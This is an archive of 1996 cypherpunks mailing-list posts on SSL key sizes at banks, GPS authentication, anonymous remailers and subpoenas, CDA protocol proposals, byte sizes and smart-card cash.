time I post.  I emailed the administrator at dca.com, a few weeks ago, but
nothing has changed.  Anyone got suggestions?

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Thu, 11 Apr 1996 12:50:01 +0800
To: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Subject: Re: Bank information protected by 40-bit encryption....
In-Reply-To: <9604101921.AA25061@spirit.aud.alcatel.com>
Message-ID: <199604102054.QAA23703@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Daniel R. Oelke writes:
> If you are the worring sort (or are looking for a ripe target)
> point your browser at:
>     https://www.diginsite.com/clients.html
> 
> There is a list of 23 Credit Unions - some (or all) of which
> allow transactions to be done over the net.
> 
> A brief once over shows that it requires Netscape 2.0 or 
> better so you will have encryption, but it does not warn you 
> when you are using only a 40-bit session key vs. a 128-bit key.
> (Netscape wizards - is there a way that the server can detect
>  this so that a warning message could be put up?)

Yes.  Netscape servers pass three (additional) environment variables to
CGI programs when used with SSL.  For a 40-bit invocation, you get:

    HTTPS=ON
    HTTPS_KEYSIZE=128
    HTTPS_SECRETKEYSIZE=40

So, you can distinguish 40- versus 128-bit usage.


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 11 Apr 1996 19:34:41 +0800
To: cypherpunks@toad.com
Subject: Re: Tense visions of future imperfect
Message-ID: <199604110019.RAA05624@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  7:33 AM 4/10/96 -0700, Hal wrote:
>From: frantz@netcom.com (Bill Frantz)
>> >[Description of dcash counterfeiting scam, presumably done by stealing
>> > the bank's public key]
>> I don't see how this third scam would work in a system such as DigiCash
>> which uses online clearing.  Unissued serial numbers would be refused when
>> presented for clearing.
>
>DigiCash banks do not issue serial numbers.  Serial numbers are randomly
>chosen by the user when he withdraws his cash. ...

Well, teach me to post without checking the protocol.  Thanks Hal and Perry.

Apologies to all - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 11 Apr 1996 17:31:55 +0800
To: cypherpunks@toad.com
Subject: Re: No matter where you go, there they are.
Message-ID: <199604110019.RAA05628@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:41 AM 4/10/96 -0400, Perry E. Metzger wrote:
Anonymous writes:
> 
> Location-based System Delivers User
> Authentication Breakthrough
> 
> By Dorothy E. Denning and Peter F. MacDoran
> Copyright(c), 1996 - Computer Security Institute - All Rights Reserved
> Top - Help
> 

When I first started reading the paper I said to myself, "Ah, they are
going to have a box that provides digitally signed GPS locations."  I still
think they might try that as plan "B".  Combined with a password or
biometrics to prevent unauthorized use of the box, they might have a
useful, if limited, system.

A few other practical problems with the system they DID describe that
haven't been mentioned:

(1) GPS doesn't work well near the walls of canyons.  The positions
reported can be off by a considerable distance.  This problem probably also
applies in the steel and glass canyons of cities.

(2) Consumer grade GPS receivers have problems acquiring satalites in
forested areas.  The same problem probably will also occur in skyscrapers. 
Using your portable in some client's office will involve shoving an antenna
out the non-openable window.

With these problems, I just can't see GPS authentication being popular for
the masses.  For some military and industrial uses it may solve a real
problem.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 11 Apr 1996 22:42:09 +0800
To: cypherpunks@toad.com, e$@thumper.vmeng.com
Subject: NPR is talking about smart card purses...
Message-ID: <v02120d01ad91dd279fbb@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Chase, Citi, MC and others are offering a stored value card on the west
side of Manhattan. They're saying that smart cards are faster than cash.
Stick the card in, say yes to the amount.  The terminals are wired directly
to a bank account, so we're looking at a book entry system, it looks
like...

The announcer is breathless at the possibilities....

I wonder if this is CAFE, Mondex, or what? anyone know?

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 12 Apr 1996 02:32:16 +0800
To: JonWienke@aol.com
Subject: Re: Message not deliverable
In-Reply-To: <960410164932_268662594@emout10.mail.aol.com>
Message-ID: <199604102200.SAA18397@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



JonWienke@aol.com writes:
> >Subj:	Message not deliverable
> >Date:	96-04-10 11:51:09 EDT
> >From:	Administrator_at_DCACINTS@dca.com (Administrator)
> >To:	JonWienke@aol.com
> 
> [body text deleted]
> 
> Has anyone else been getting these when they post to cpunks?

Yes.

> I get one every
> time I post.  I emailed the administrator at dca.com, a few weeks ago, but
> nothing has changed.  Anyone got suggestions?

1) Send mail to postmaster.
2) Track down dca.com's administrative or technical contacts from the
   whois database and call them on the phone.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Thu, 11 Apr 1996 16:06:27 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Enforcing the CDA improperly may pervert Internet architecture
In-Reply-To: <2.2.32.19960410010847.00c91674@panix.com>
Message-ID: <199604102307.TAA24312@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell writes:
>At 12:38 PM 4/9/96 -0500, Scott Brickner wrote:
>
>>Wait a second.  I don't know that it's really as impossible as you
>>think.  Given the CDA advocates' hypothesis that anonymity is a Bad
>>Thing (tm), it's reasonable for them to assume that the ISP can arrange
>>to have a policy requiring that it know who's making the SLIP/PPP
>>connection.  It's not too hard to have *every* packet generated by a
>>given connection flagged with an IP option indicating "adult" or
>>"minor".
>
>Of course that doesn't overcome the "technical problem" of getting the IETF
>to adopt that change in the protocols and getting a significant number of
>sites to adopt the new protocol.  Even if you impose a substitutte on the
>IETF, it doesn't stop them from wandering off and creating their independent
>protocols and seeing whether the "official" or the "unofficial" get adopted.

Actually, the IP layer specifies "options", but doesn't use all of
them.  I think undefined options aren't interpreted by the router,
except to observe the "copy on fragment" bit's setting.  Even if they
are, using the existing "security compartment" instead of defining a
new option could do the same thing.  Using security compartment might
permit the use of existing equipment everywhere, making the transition
to this scheme require only reconfiguration of a subset of existing
routers.  IPv4 is so stable now that adopting a new option is *very*
unlikely to break anything in existing routers.  Let's say that option
class 1 (currently unused) is used for the information.  Option number
1 means "adult", option number 2 means "not adult".  Neither option
requires parameters, so they only mean one more octet per packet (13 if
security compartment is used).  The "copy on fragment" bit is set in
both.

Now, let's assume the worst:  the CDA is upheld through a few of these
court cases.  The IETF's raison d'etre is to facilitate usage of the
Internet, privacy isn't a goal per se.  With all the US members
scrambling to figure out how to cope with CDA, *many* of the members
might consider something like this to be a relatively easy protocol
fix.  Routers that don't accept packets directly from customers will
already work fine.  At the borders of autonomous systems, system owners
may categorize each link as "adult", "non adult", or "unspecified".
"Unspecified" means they can use an existing router, and assumes that
the other end bears responsibility for having the right "adulthood"
option.  For "adult" or "non adult", they need a router with software
modified to put the right option in all packets.  For switched
connections, like SLIP or PPP, the router needs to know who's on the
other end and put the appropriate options in the packets.

Ultimately, a relatively small number of network components need to be
changed, and almost all of them may be changed through fairly simple
software updates.  Still think the IETF would refuse?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Thu, 11 Apr 1996 15:48:49 +0800
To: Paul_Koning/US/3Com%3COM@smtp1.isd.3com.com
Subject: Re: No matter where you go, there they are.
In-Reply-To: <9604101822.AA1919@>
Message-ID: <199604102224.SAA07900@nrk.com>
MIME-Version: 1.0
Content-Type: text


> 
> >Location-based System Delivers User
> >Authentication Breakthrough
> 
> >By Dorothy E. Denning and Peter F. MacDoran
> 
> Nice april fools article...  

I doubt it, only because having met her at GAK meetings, IMHO she 
lacks the humor gene....

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Thu, 11 Apr 1996 22:57:33 +0800
To: cypherpunks@toad.com
Subject: Re: Bank transactions on Internet
In-Reply-To: <9604100239.AA12152@pig.die.com>
Message-ID: <9604102227.AA0401@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


  >>  At 12:13 AM 4/9/96 -0700, Steve Reid wrote:
  >> a board-mounted AT&T Orca chip available for around $400. They
  >> said it could crack a 40-bit key in 5 hours (average)...
  >> ... Has anyone out there seen one of these?

>>>>> "Dave Emery" <die@pig.die.com> pessimised:

  > [... the tools are too expensive...]
  > [... and the skills required are too high...]
  > [... for anyone on cypherpunks...]

Come on, Dave, this isn't alt.2600!  

Most of the subscribers to this list are professionals -- engineers,
programmers, mathematicians, lawyers -- not phone phreaks.  I'm sure
that there are more than a few of us with the knowledge, experience,
and free access to the resources needed to handle most relatively
small-scale designs like this.

(It's like saying that no one on cypherpunks has access to the
distributed computing resources necessary to perform other sorts of
brute-force cracking -- which is patently ludicrous.)

For instance, from where I'm sitting in my *home* office, I can see
the full development packages for Xilinx and AT&T FPGAs, Viewlogic
VHDL, schematic, and simulation tools, an HP 1660A logic analyser, and
a Tek THS 720 500 MHz digital scope.

And I doubt if I'm the only one here who does this for a living.

The problem isn't resources, but time and motivation -- what sort of
situation would it take to get me (for instance), and one of
cypherpunk's cryptography wizards, to take the time to collaborate on
something like this.

(BTW, if you're willing to break the design into a couple of FPGAs,
like the Motorola MPA 1000 devices, you can find all the software you
need for free...)

-- 
Roger Williams            PGP key available from PGP public keyservers
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 11 Apr 1996 17:30:44 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: questions about bits and bytes
In-Reply-To: <m0u736N-0008yBC@pacifier.com>
Message-ID: <Pine.SOL.3.91.960410182824.5230D-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


No, bytes are no always 8 bits - some machines use(d) 9-bit bytes. That's 
why we have the word octet.



---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 11 Apr 1996 21:18:37 +0800
To: cypherpunks@toad.com
Subject: Re: questions about bits and bytes
In-Reply-To: <m0u736N-0008yBC@pacifier.com>
Message-ID: <JZX7LD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> writes:
> >Be careful writing code - sometimes a byte is -128 to 127 instead of 0 to 25
> >Also, there are machines (mostly old kinky ones) that use bytes of sizes
> >other than 8 bits.
>
> No, Bill, a "byte" has ALWAYS been 8-bits.  One of the main reasons
> the term "byte" was invented was because the term "word" (as in, "word
> length") varied for different computers, especially in the 1960's. (In fact,
> many computers of that era used word lengths other than 8, 16, 32, 64 bits,
> as surprising as this may sound to the current crop of PC and Mac
> afficionados.)  This made it inconvenient to talk about memory capacities
> unless you were referring to the same machine.  The solution was to invent a
> new term, "byte," which conviently had about the same size as an ASCII
> character and was always 8 bits.

I used to hack a CDC Cyber box designed by Seymour Cray before he started his
oen company. It had the following curious features:

1 word = 10 _bytes_ = 60 bits
1 _byte_ = 6 bits

Out of respect for Jim, I dug up the dox, which say: "On the 6600, the basic bit
groupings are 6, 12, 15 and 30 bits". The dox consistently refer to the 6-bit
chunks as "characters", never bytes. However I've heard people refer to 6 bits
as bytes and to 3 bits (an octal digit) as nybbles.

Naturally, the character set had only 64 symbols - no lowercase letters.

Both integers and reals were 60 bits.

Addresses in the instructions were 15 bits, but that was an address of a
60-bit word.

Negative numbers were represented with one's compliment (i.e. -X = NOT X).
Hence there were two zeroes: positive and negative.


I believe BESM-6 also had 6-bit bytes. I have the dox for it someplace
(in Russian) but can't find them offhand.

Moral: it's not necessarily redundant to say '8-bit byte'.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 11 Apr 1996 22:01:34 +0800
To: cypherpunks@toad.com
Subject: Re: Protocols at the Point of a Gun
Message-ID: <ad91aa3306021004ff98@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:48 PM 4/10/96, Duncan Frissell wrote:

>Well this is as good a time and place as any to ask the question that
>none of the opposition seems to have asked (perhaps because they don't
>know enough to ask):  How do you force geographically dispersed nodes
>on a distributed network to adopt a set of officially mandated protocols?
>
>But first a reading assignment:  "How Anarchy Works--Inside the Internet
>Engineering Task Force" from Wired.
>
>http://www.hotwired.com/wired/3.10/departments/electrosphere/ietf.html

I'd also recommend Michael Froomkin's article "The Internet as a Source of
Regulatory Arbitrage," available at

http://www.law.miami.edu/~froomkin/arbitr.htm

It gets into the nature of IETF-type stuff, especially vis-a-vis the
difficulty jurisdictions have in enforcing parochial rules.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Sun, 14 Apr 1996 06:16:22 +0800
To: cypherpunks@toad.com
Subject: New paper on crypto regulation and the right to privacy available
Message-ID: <199604100657.SAA28234@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


A paper exploring various aspects of cryptography and cryptography regulation
has just been published in the Journal of Universal Computer Science (J.UCS).
J.UCS is a Springer-Verlag electronic publication available at
<A HREF="http://hyperg.iicm.tu-graz.ac.at/0x811b9908_0x0008eaac;sk=74BEC6EF">
J.UCS</A>.  It's coming off a non-HTTP server so I can't give a direct URL, you
need to follow the links to Volume 2, No.3 to find:
 
  Government, Cryptography, and the Right to Privacy
  J.Shearer, P.Gutmann
 
  The notion of a right to privacy of citizens in their communications is
  discussed in the context of an international movement by governments towards
  regulation of cryptography, and consideration of key forfeiture systems in
  national cryptography use.  The authors argue that the right to privacy in
  communications networks is an issue of major importance, assuring freedom of
  the individual in national and global communications.  Regulation and control
  of cryptography use on the Internet by national governments may lead to an
  imbalance in the citizen/government power relationship, with sequelae
  including unprecedented surveillance of citizens, disruption of international
  commerce due to lack of powerful cryptography (and lack of standardisation),
  human rights abuses by less democratic or non-democratic governments, and
  limiting of the political potential of an Internet global political system.
 
Peter.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 11 Apr 1996 17:32:07 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: questions about bits and bytes
Message-ID: <m0u7BgI-00091BC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:29 PM 4/10/96 -0700, Simon Spero wrote:
>No, bytes are no always 8 bits - some machines use(d) 9-bit bytes. 

I notice you gave no examples.  Why is that?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Thu, 11 Apr 1996 21:28:27 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: questions about bits and bytes
In-Reply-To: <m0u736N-0008yBC@pacifier.com>
Message-ID: <m0u799t-0004LyC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


jim bell writes:

: >At 09:33 PM 4/8/96 -0400, Jack Mott wrote:
: . . . .
: >Also, there are machines (mostly old kinky ones) that use bytes of sizes
: >other than 8 bits.
: 
: No, Bill, a "byte" has ALWAYS been 8-bits.  One of the main reasons 
: the term "byte" was invented was because the term "word" (as in, "word 
: length") varied for different computers, especially in the 1960's. (In fact, 
: many computers of that era used word lengths other than 8, 16, 32, 64 bits, 
: as surprising as this may sound to the current crop of PC and Mac 
: afficionados.)  This made it inconvenient to talk about memory capacities 
: unless you were referring to the same machine.  The solution was to invent a 
: new term, "byte," which conviently had about the same size as an ASCII 
: character and was always 8 bits.

One trouble with this statement was that an ASCII character only has 7
bits.  Another is that when I snuck into the IBM Executive Computer
Concepts Course in the mid-sixties, we [a bunch of high-powered
executives and me] were told, as I recall, that originally the term byte
was used by some to represent 7 bits.  IBM took credit for standardizing
the term on 8 bits.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 12 Apr 1996 00:45:17 +0800
To: cypherpunks@toad.com
Subject: Re: Scientologists may subpoena anonymous remailer records
Message-ID: <ad91b12508021004a169@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:12 PM 4/10/96, Steve Reid wrote:
>> I thought that most or all of the cypherpunk anonymous remailers don't
>> keep records.  Not even on backup tapes.  The whole idea is that there
>> aren't logs.  But maybe they have found some remailers that are
>
>When a person recieves a message from someone using an anonymous
>remailer, the return address will usually work, depending on the
>remailer. The return address is for an address on the remailer, and
>sending to that address, the remailer will forward the message back to
>the person who owns that anonymous address.

Not the standard "Cypherpunks"-style remailers, except with some fairly
cumbersome tricks with "reply blocks" and/or message pools. I think you are
thinking of Julf's system, of which there is only one instance, his.

>I don't really know much about remailers, but I don't think there's much
>to know... If I'm mistaken about any of the above, I'm sure someone will
>correct me.

Glad to oblige. I note also that Jim Byrd and Jim Warren are unclear on
some details. (To Jim Byrd, that "alumni account at Cal Tech" that you
mentioned was one of the Cypherpunks remailers at Caltech that our own
pioneering Hal Finney runs.)

Cypherpunks remailers account for something like 29 out of 30 of all the
world's remailers, by site count, though not volume. Sophisticated users
know that the Cypherpunks model is the only robust one; Julf's approach has
an ecological niche, but is highly vulnerable to the very subpoena approach
used recently (not "several years ago" as Jim Warren says).

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 11 Apr 1996 22:54:41 +0800
To: Jim Byrd <cypherpunks@toad.com
Subject: Re: Anonymous Remailer threat: Scientologists may subpoena	  anonymous remailerrecords?
Message-ID: <ad91b30d0902100413eb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:37 PM 4/10/96, Jim Byrd wrote:

>The story is weirder than that.  The first poster of church secrets (with
>lots of commentary) was Dennis Erlich, an ex-scientologist.  Dennis was
>raided and sued, and is awaiting trial.  His ISP, Tom Klemesrud, refused

His ISP was Netcom. Klemesrud respresents Netcom.


>to find the identity of -AB-.  This turned out to be an alumni account at
>Cal Tech.  The poster has never been heard from again.

This was without a doubt just a user of one of Hal Finney's remailers he
runs out of an account at Caltech. (There's a tiny chance it was someone
else, but it fits the description of Hal's "alumni" remailer exactly, and
is almost certainly just that.)

This is a Cypherpunk-style remailer, and Hal is one of the original Cypherpunks.

The concept of "The poster has never been heard from again" is essentially
meaningless, unless he or she or signed the message and established a
persistent personna.

Sorry to sound picky, but I've just seen several messages all of which copy
a long dialog from some Finnish guy named Kaj. Some of the messages then
confuse the issues by confusing the types of remailers.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Allyn 206-860-9454 <allyn@allyn.com>
Date: Thu, 11 Apr 1996 17:29:19 +0800
To: declan+@CMU.EDU (Declan B. McCullagh)
Subject: Re: CDA Court Challenge: Update #5
In-Reply-To: <slOnt1W00YUv9D5F8c@andrew.cmu.edu>
Message-ID: <199604110234.TAA22950@mark.allyn.com>
MIME-Version: 1.0
Content-Type: text/plain


snatched it away, snarling: "Not available to the public." Well, the
URLs ended up in my mailbox anyway, so here they are for your
amusement:

  http://www.pu55y.com/hotsex/join.html
  http://shack.bianca.com/shack/misc/terms.html
  http://www.intergate.net/untmi/obbs1.html
  http://www.whitman.edu/~burkotwt/pornpics/lady941.jpg
  http://www.wizard.com/~gl944vx/gifs/01_21.jpg
  http://www.vegaslive.com/sgguests/ginger.html
  news:4hrs89k%24oap@what.why.net
  http://monkey.hooked.net/monkey/m/grinder/nikkita/graphics/nikki36.jpg
  news:313F56FD.3F19@access.mountain.net
  news:4hb94m%24sij@asp.erinet.com
  http://www.sexvision.com/web2.htm
  news:314048f.1657746@news.netwalk.com

You forgot one:

  http://clearplastic.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Thu, 11 Apr 1996 19:32:49 +0800
To: pcw@access.digex.net
Subject: Re: No matter where you go, there they are.
Message-ID: <960410195146_466946290@emout04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-04-10 17:49:32 EDT, you write:

>Or course, I could be completely missing some neat feature of
>DGPS. I really don't know the details of how it works and this
>could be completely wrong. Any thoughts?

Because of the fluctuations in the signals, random and otherwise, you would
be detected if you used recordings that were more than a few seconds old.
 However, if you delayed all but one of the satellite signals by a few
milliseconds (or fractions thereof) to get the desired phase relationship,
you could effectively fake your position, and the delay would be masked by
the delays inherent in the Net by a pretty good margin.  The longer the
average packet transfer delay between you and the other party, the farther
you could fake your position from your real one without being detected.

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Thu, 11 Apr 1996 21:57:10 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Protocols at the Point of a Gun
In-Reply-To: <v02120d2bad91ecd377cc@[192.0.2.1]>
Message-ID: <199604110005.UAA00491@localhost.cjs.net>
MIME-Version: 1.0
Content-Type: text


> At 9:48 4/10/96, Duncan Frissell wrote:
> [...]
> >We know that governments would like to impose things like the Simple
> >Tax Transfer Protocol on the Net as well as Is A Person (and Is A Minor)
> >Protocols.
> 
> There is one thing about the proposed minor flag addition to IP that I
> don't understand. [No, I am not surprised by this. Mandatory authorization
> to establish a connection and an "Internet Driver License", probably in the
> form or a smart card are coming].
> 
> If my computer creates the IP packet, what is there to prevent me from
> modifying the value of the "Minor/Adult" flag at my leisure?

In the future, you will have to sign all packets (with a key
conveniently available from verisign and noone else).

Just kidding. =) 

Christopher




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 11 Apr 1996 17:08:29 +0800
To: cypherpunks@toad.com
Subject: Digital Cash Escrow
Message-ID: <ad91bd700a02100484a7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:14 PM 4/10/96, Bill Stewart wrote:

>Of course, if you happen to become dead while you're storing it,
>the paper cash is far more useful to your heirs, so I assume we'll have
>a government-sponsored cash-escrow system announced soon to protect
>the government's interest in collection of inheritance taxes...

Don't give them ideas, Bill! They are known to monitor our list for
insights into what to regulate next, and I can see the 15-watt lightbulbs
going on over their heads as they ponder the wonderful opportunities
presented by "digital cash escrow."

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Thu, 11 Apr 1996 21:43:10 +0800
To: cypherpunks@toad.com
Subject: Money supply is fake anyway
Message-ID: <Pine.SUN.3.91.960410202317.1705C-100000@kolo.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



>   Garfinkel described it like this: "My name is Agent
>   Jenkins. I'm an investigator with the secret service,
>   working on a counterfeiting case. And it's tough. Last
>   year, my office got a priority call from an economist at
>   Stanford. The economist was looking at something called the
>   money supply and velocity and both were increasing a little
>   too fast. They just didn't add up. The economist finally
>   figured an organisation was printing its own electronic
>   money -- just like the US government does.

Banks "invent" money on a daily basis.  You would have to counterfeit a 
great deal of currency (probably more than it out there right not) before 
you would start making a serious impact on the money supply. 

That said, enough counterfeit money may change the way people value 
money, and may cause inflation.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Thu, 11 Apr 1996 20:50:50 +0800
To: "Daniel R. Oelke" <droelke@rdxsunhost.aud.alcatel.com>
Subject: Re: Bank information protected by 40-bit encryption....
In-Reply-To: <9604101921.AA25061@spirit.aud.alcatel.com>
Message-ID: <316C8427.52BF@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Daniel R. Oelke wrote:
> 
> If you are the worring sort (or are looking for a ripe target)
> point your browser at:
>     https://www.diginsite.com/clients.html
> 
> There is a list of 23 Credit Unions - some (or all) of which
> allow transactions to be done over the net.
> 
> A brief once over shows that it requires Netscape 2.0 or
> better so you will have encryption, but it does not warn you
> when you are using only a 40-bit session key vs. a 128-bit key.
> (Netscape wizards - is there a way that the server can detect
>  this so that a warning message could be put up?)

For Netscape servers, you can configure which ciphers you want to use.
I'm sure Apache-SSL and most other SSL-capable servers have the same
sort of thing.  I know that Wells Fargo, at least, requires 128-bit
encryption.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 11 Apr 1996 19:41:47 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Anonymous Remailer threat: Scientologists may subpoena
In-Reply-To: <ad91b30d0902100413eb@[205.199.118.202]>
Message-ID: <199604110423.VAA03176@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Sorry to sound picky, but I've just seen several messages all of which copy
> a long dialog from some Finnish guy named Kaj. Some of the messages then
> confuse the issues by confusing the types of remailers.
> 

	Frankly, I'm getting antsy. Is C2 going to get subpoena'd or
not? I would be very disappointed if we don't.
	(Subpeonas envy!)

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 11 Apr 1996 17:51:17 +0800
To: rah@shipwright.com
Subject: NPR is talking about smart card purses...
Message-ID: <199604110124.VAA01983@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by rah@shipwright.com (Robert Hettinga) on 
Wed, 10 Apr  5:53 PM

>Chase, Citi, MC and others are offering a stored value 
>card on the west  side of Manhattan. They're saying 
>that smart cards are faster than cash.  Stick the card 
>in, say yes to the amount.  The terminals are wired 
>directly  to a bank account, so we're looking at a book 
>entry system, it looks  like...
>
>The announcer is breathless at the possibilities....
>
>I wonder if this is CAFE, Mondex, or what? anyone 
>know?

----------


Yep, NYT has a story on it today, the testrun is in my own 
pigsty.


It's by Citibank, Chase Manhattan, Mastercard and Visa: 
electronic cash loaded on a plastic card that can be used to 
make small purchases.


The article also reviews the state of the art.


